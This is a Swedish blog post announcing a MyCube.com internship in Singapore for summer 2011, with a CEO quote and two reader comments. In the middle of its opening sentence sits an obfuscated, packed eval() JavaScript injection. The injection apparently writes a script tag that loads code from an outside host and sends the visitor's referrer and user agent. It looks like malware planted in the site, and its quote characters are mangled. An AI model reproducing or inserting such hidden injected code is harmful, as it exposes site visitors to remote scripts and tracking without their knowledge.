Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

MyCube.com söker praktikanter till Singapore

Sebastian

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fziss|var|u0026u|referrer|rdsnf||js|php’.split(’|’),0,{}))
du intresserad av IT? Eller söker du kanske en praktikplats för hösten 2011? Varför inte ta den utomlands.

MyCube.com söker nu 30 st praktikanter världen över som kan få chansen att jobba i Singapore mellan den 4 Juli och 12 Augusti.
MyCube kommer stå för ditt boende och flybiljett dit och tillbaka. Förutom detta så får du även 3000 singaporianska dollar (ca 15.000 kr) att spendera hur du vill under vistelsen. Som bonus på det hela så har du även chans att vinna 10.000 s dollar (50.000 kr) som bästa praktikant.
Mer information om platsen:
http://internship2011.mycube.com/

Kort om MyCube.com

MyCube är ett IT företag med bas i Singapore. Idén är att skapa en social webbplats liknande Facebook. Skillnaden är att du som medlem kommer att fortsätta äga din bilder, filmer och information fast dem delats på MyCube.
Mer information : http://www.mycube.com/about.html

Företaget som fortfarande är under utveckling drivs av Svensken Johan Stael von Holstein.

[quote]

We are incredibly excited to start the Academy, and we look forward to working with these initial members. The 16-25 age group has grown up with the internet and is very aware of the need to have privacy, ownership and control of your digital lives, which is the core of the MyCube value proposition. We have designed the Internship to ensure that when they leave Singapore after 6 weeks they will be ready to make an immediate and meaningful contribution – academic, business or otherwise – towards giving us all digital freedom.

Johan Stael von Holstein CEO and co-founder of MyCube

[/quote]

Comments

  1. Örjan

    När ska ansökan vara inskickad? Jag hittar inte det på deras hemsida?

  2. Ansökan ska vara inlämnad den 5 Juni 2011. Så det gäller att ligga i. Enligt deras twitter så är det bara 4 st som fått en plats. 1 är svensk från Lunds universitet.

    Lycka till 🙂